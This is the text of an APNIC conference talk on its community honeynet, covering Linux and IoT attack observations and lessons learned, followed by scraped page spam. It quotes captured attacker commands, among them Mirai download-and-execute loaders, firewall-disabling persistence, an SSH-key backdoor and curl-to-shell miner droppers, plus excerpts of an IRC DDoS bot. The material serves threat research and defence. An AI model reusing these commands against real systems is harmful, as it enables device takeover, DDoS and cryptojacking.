Observations and Lessons Learned from
the APNIC Community Honeynet Project
Adli Wahid
Senior Internet Security Specialist, APNIC
adli@apnic.net
Let’s Connect!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP Key fingerprint = 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
Talk Overview
1. APNIC Community Honeynet Project
2. Observations on activities targeting Linux servers and IoTs
3. Lessons Learned / Reflections
Overview of the APNIC Community Honeynet Project
APNIC Community Honeynet Project
• Context
– Educational – using honeypots to understand network security attacks / threats, as part of our network security training
– Situational awareness, the bigger picture, cooperation with other stakeholders, tools (e.g. the MISP threat sharing platform, Wireshark, Suricata, etc.)
• Collaboration
– Partners deploy honeypots, APNIC runs the backend
– Information collected among partners & threat sharing*
• Outcomes
– More than 50 distributed honeypots* in the AP region since 2017
– Threat information shared with APNIC members and partners (e.g. CERTs/CSIRTs, network operators)
• https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind-the-scenes/
• https://dash.apnic.net
APNIC Community Honeypot
1. Purpose and Placement
o Research & Alerting – Internet
2. Type of Honeypots
o Cowrie, Dionaea, RDPHoney
3. Deployment
– Community Honey Network (fork of Modern Honey Network)
– Partners & Self Hosting
4. Data Collection & Analysis & Action
– Logs, Visualization, Alert, Action (Incident Response)
– Elasticsearch, Kibana, Logstash, Beats
– Suricata IDS
– ElastAlert + Slack
5. Maintenance
– Ansible
– LibreNMS
[Screenshots: detection with Suricata rulesets; Slack alert]
Community Honeynet Infrastructure
[Diagram: distributed honeypots → hpfeeds → CHN / MHN servers → Filebeat (json) over TLS → Logstash → Elasticsearch → Kibana, ElastAlert and BigQuery]
MHN – Modern Honey Network
CHN – Community HoneyNetwork
[Dashboard screenshots] * Traffic from the last 30 days
Country View – Pakistan (Last 90 days)
Observations and Lessons Learned
Linux/Unix Malware
• Routers / IoT devices / servers run Linux / Unix based OS
• Not new, but pervasive
– Targets are exposed on the Internet (http, telnet, ssh)
– Unpatched / unmonitored (e.g. no anti-virus, firmware upgrades not applied)
– Default / weak credentials
• Popular example – Mirai (DDoS agent)
– Source code was shared publicly
– Many variants – josho, owari, masuta, sora etc.
– Gafgyt
• Simple techniques for infecting, spreading & persistence
• Interesting scenarios
– Working from home
– Servers / hosting / cloud
Different Perspectives of a DDoS
[Diagram: the same DDoS seen from three vantage points – my network / infrastructure / host as the source, the target / victim perspective, and the attacker perspective]
Service & Attacker Infrastructure
• Setting up the infrastructure
• Misconfigured services
– Servers - NTP, DNS, SSDP, etc
– Amplification attack
– Spoof source of request
– https://stats.cybergreen.net/
– https://www.shadowserver.org/what-we-do/network-reporting/get-reports
• Active bot “recruitment”
– Internet exposed services
– Vulnerable devices
– Weak credentials
“Recruitment Process”
[Diagram: (1) the attacker scans and gains access to the source device, by brute force (username: admin, password: 12345) or remote code execution via the web interface; (2) the device downloads and executes a binary, e.g. wget http://37.x.2x.190:80/13747243572475/hx86_64, then connects to the command and control (C&C)]
Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
– Allows the attacker to log in
• Emulates a Linux/Unix environment
– Captures commands issued by the attacker after login
– Including downloads
• ”Look and feel” of Linux/Unix servers and IoT devices
• Attracts a certain class of attacks
– Scan for SSH/Telnet
– Brute-force username/password
– Login & execute payload(s)
• DDoS agents & cryptominers
– Based on post-login activities and binaries collected
[Screenshot: Mirai sample – 2016]
Successful Logins – New Honeypot
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:50.568233Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "123.b.c.12",
  "session": "fd7977b0b54a",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:59.378766Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "80.x.y.62",
  "session": "fdcd399b1282",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
Execute Payload
#!/bin/sh
cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
Other post-login command samples captured by the honeypots:

/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash

system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst-path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
Perl Script
command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt

my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick =$rircname[rand scalar @rircname];
my $server = '125.x.y.z53';
my $port = '1947';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help:
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example)
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
}
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
Source code of IRC based bot
Linux/Mirai – Fbot
https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html
2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab-7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech']
2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518']
Cryptominers / Cryptojacking
curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
Snippet of shell script
if [ ! -f "4d867bd38706a5f7" ]; then
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "64x" ]; then
(curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7
||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7
||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7
||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7
||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7
||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
Find hash related to URL serving malware
a5fba021a41c520a81647cda41110033eba4f8842eb3239f227bcbb0b1b110d6
Rocke Gang
1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916 (May 2019)
2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers (May 2019)
3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect (Oct 2019)
4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/ (Oct 2019)
Process listing (ps) of a running miner on a compromised web server:
www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
Analysis - Interesting indicators
• IP addresses of hosts used for initial access, which run a script to download the binary/malware
– Normally compromised systems
• IP addresses of hosts serving the binary/malware + other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• SSH keys, webshells, group names, IRC #channels
• Miner related information
• Correlate with other observations, reports, etc.
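The indicators on this slide can be pulled out of the Cowrie JSON events shown earlier (the two cowrie.login.success records) without waiting for a dashboard. The script below is an added example, not the APNIC project's code; it assumes Cowrie's JSON-lines output with cowrie.command.input (field "input") and cowrie.session.file_download (fields "url", "shasum") events alongside the login events, and all addresses, hashes and URLs in the sample log are constructed.

```python
"""Correlate Cowrie honeypot events into the indicator classes listed above."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one Cowrie event per line, in the shape of the
# cowrie.login.success events shown on the earlier slide. Addresses use
# documentation ranges; the hash and URL are made up for the example.
SAMPLE_LOG = """\
{"eventid": "cowrie.login.success", "username": "root", "password": "taZz@23495859", "timestamp": "2018-10-07T19:31:50.568233Z", "src_ip": "192.0.2.12", "session": "fd7977b0b54a", "sensor": "mn-001"}
{"eventid": "cowrie.login.success", "username": "root", "password": "taZz@23495859", "timestamp": "2018-10-07T19:31:59.378766Z", "src_ip": "198.51.100.62", "session": "fdcd399b1282", "sensor": "mn-001"}
{"eventid": "cowrie.command.input", "input": "cd /tmp || cd /var/run; wget http://203.0.113.5/bins/mirai.mips -O mirai.mips; chmod 777 mirai.mips; ./mirai.mips", "timestamp": "2018-10-07T19:31:52.000000Z", "src_ip": "192.0.2.12", "session": "fd7977b0b54a", "sensor": "mn-001"}
{"eventid": "cowrie.session.file_download", "url": "http://203.0.113.5/bins/mirai.mips", "shasum": "0000000000000000000000000000000000000000000000000000000000000001", "timestamp": "2018-10-07T19:31:53.000000Z", "src_ip": "192.0.2.12", "session": "fd7977b0b54a", "sensor": "mn-001"}
{"eventid": "cowrie.login.success", "username": "admin", "password": "12345", "timestamp": "2018-10-07T20:10:00.000000Z", "src_ip": "198.51.100.9", "session": "aa0011223344", "sensor": "mn-002"}
"""

# URLs typed into the emulated shell (wget/curl/tftp loaders, as in the
# "Execute Payload" slide); stop at shell separators and quotes.
URL_RE = re.compile(r"(?:https?|tftp)://[^\s;|&'\"]+")


def parse_events(text):
    """Parse JSON-lines output, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def _ts(event):
    # Cowrie timestamps are ISO 8601 with microseconds and a trailing Z.
    return datetime.strptime(event["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")


def shared_credentials(events, window=timedelta(minutes=5), min_sources=2):
    """Credentials that succeed from several source IPs inside one window.

    The two slide events (same root/taZz@... password, two IPs, nine seconds
    apart) are the pattern: one campaign driving many bots with one
    hard-coded credential list, not independent guessing.
    """
    by_cred = defaultdict(list)
    for e in events:
        if e.get("eventid") == "cowrie.login.success":
            by_cred[(e["username"], e["password"])].append((_ts(e), e["src_ip"]))
    hits = {}
    for cred, uses in by_cred.items():
        uses.sort()
        for i, (t0, _) in enumerate(uses):
            ips = {ip for t, ip in uses[i:] if t - t0 <= window}
            if len(ips) >= min_sources:
                hits["%s/%s" % cred] = sorted(ips)
                break
    return hits


def payload_urls(events):
    """Download URLs from typed commands and from file_download events,
    with the hashes Cowrie recorded for the files it actually fetched."""
    urls = defaultdict(lambda: {"hashes": set(), "sources": set()})
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            for url in URL_RE.findall(e.get("input", "")):
                urls[url]["sources"].add(e["src_ip"])
        elif e.get("eventid") == "cowrie.session.file_download" and e.get("url"):
            urls[e["url"]]["sources"].add(e["src_ip"])
            if e.get("shasum"):
                urls[e["url"]]["hashes"].add(e["shasum"])
    return {u: {"hashes": sorted(v["hashes"]), "sources": sorted(v["sources"])}
            for u, v in urls.items()}


def summarize(text):
    """Split indicators the way the slide does: hosts used for initial
    access versus hosts serving the binary, plus credentials and hashes."""
    events = parse_events(text)
    urls = payload_urls(events)
    serving_hosts = sorted({re.sub(r"^\w+://", "", u).split("/")[0].split(":")[0]
                            for u in urls})
    return {
        "shared_credentials": shared_credentials(events),
        "payload_urls": urls,
        "serving_hosts": serving_hosts,
        "access_sources": sorted({e["src_ip"] for e in events
                                  if e.get("eventid") == "cowrie.login.success"}),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_LOG), indent=2))
```

Point the script at a real cowrie.json (one event per line) to get the same summary for a live sensor; the serving hosts and hashes are what you would forward to partners via MISP.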
Lessons Learned
Lessons Learned
• Context: how can we “improve” security?
• Bad Practices
o Telnet enabled by default on devices
o Weak or default credentials not removed
o Services not developed securely
o Services not deployed securely (e.g. management interfaces shouldn’t be exposed on the Internet)
o No action upon notification (not our device, it is the customers)
• Miscreants will exploit the weaknesses & monetize
Source IP from TO
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21
AbuseIPDB
Back to the drawing Board?
• Keeping the Internet safe and secure for _everyone_
• Education
– Users, operators, developers
• Governance
– Incident Response
– Roles and responsibilities
– Accountabilities
Thank You!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
https://www.unsplash.com/adliwahid
Deck title on SlideShare: IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project
IDNIC OPM 2023 - Internet Number Registry SystemAPNIC
 

More from APNIC (20)

IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet development
 
AFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment Status
 
AFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressing
 
AFSIG 2023: APNIC - Registry & Development
AFSIG 2023: APNIC - Registry & DevelopmentAFSIG 2023: APNIC - Registry & Development
AFSIG 2023: APNIC - Registry & Development
 
Afghanistan IGF 2023: The ABCs and importance of cybersecurity
Afghanistan IGF 2023: The ABCs and importance of cybersecurityAfghanistan IGF 2023: The ABCs and importance of cybersecurity
Afghanistan IGF 2023: The ABCs and importance of cybersecurity
 
IDNIC OPM 2023: IPv6 deployment planning and security considerations
IDNIC OPM 2023: IPv6 deployment planning and security considerationsIDNIC OPM 2023: IPv6 deployment planning and security considerations
IDNIC OPM 2023: IPv6 deployment planning and security considerations
 
IDNIC OPM 2023 - Internet Number Registry System
IDNIC OPM 2023 - Internet Number Registry SystemIDNIC OPM 2023 - Internet Number Registry System
IDNIC OPM 2023 - Internet Number Registry System
 

Recently uploaded

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 

Recently uploaded (20)

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
